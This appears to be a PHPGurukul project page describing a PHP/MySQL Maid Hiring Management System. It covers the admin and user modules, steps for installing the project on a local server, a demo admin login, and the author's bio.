In Maid Hiring Management System Project we use PHP and MySQL Database. This project keeps the records of maids and booking requests of maids. Maid Hiring Management System has two modules i.e. admin and user.

**Admin Module**

**1\. Home**:  In this section, admin can briefly view the total new booking, approved/assign bookings, Cancelled Bookings, and Total category of maids.

**2\. Category:**  In this section, admin can manage the category (add/update/delete).

**3\. Maid:** In this section, admin can manage the maid(add/update/delete).

**4\. Page:**  In this section, admin can manage the about us and contact us pages..

**5\. Maid Hiring Request:** In this section, the admin can view new maid requests, and approve and cancel maid booking requests. In this section admin also assign a maid to the booking request.

**8\. Search:** In this section, admin can search maid and booking details with the help of his/her maid ID and booking number respectively.

Admin can also update his profile, change the password and recover the password.

 **User Module**

**1\. Home:** It is a welcome page for users.

**2\. About:** It is an about us page of the website.

**3\. Request for Maid**: In this section, the user can send a request for a maid.

**4\. Contact**: It is a contact us page where users can check the Contact Details

****Some of the Project Screens****

**Home Page**

**Maid Hiring Form**

**Admin Dashboard**

**Add Maid Form**

**How to run the Maid Hiring Management System (mhms) Project**

1\. Download the zip file

2\. Extract the file and copy mhms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name mhmsdb

6\. Import mhmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/mhms

**Credential for Admin panel :**

**Username:** admin  
**Password:** Test@123

**Demo**

Download Source Code (MHMS Project PHP)

Size: 17.8 MB

Version: V 1.0

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

Tag

#chrome